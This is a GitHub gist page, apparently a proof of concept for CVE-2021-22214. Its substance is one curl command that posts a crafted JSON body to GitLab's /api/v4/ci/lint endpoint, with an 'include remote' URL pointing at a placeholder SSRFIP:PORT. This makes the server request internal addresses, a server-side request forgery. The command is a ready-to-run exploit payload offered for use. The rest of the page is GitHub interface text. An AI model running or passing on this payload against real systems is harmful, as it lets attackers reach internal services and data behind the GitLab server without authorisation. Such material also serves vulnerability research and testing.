Created
January 2, 2024 19:57
-
-
Save M507/4a63fdbd32805a36e95ae46dff1e09ad to your computer and use it in GitHub Desktop.
CVE-2021-22214.sh
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# https://github.com/Vulnmachines/gitlab-cve-2021-22214/blob/main/cve-2021-22214 | |
curl -s -show-error -H 'Content-Type: application/json' https://127.0.0.7/api/v4/ci/lint -data '{ "include_merged_yaml": true, "content": "include:n remote: http://SSRFIP:PORT/api/v1/targets?test.yml"}' |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment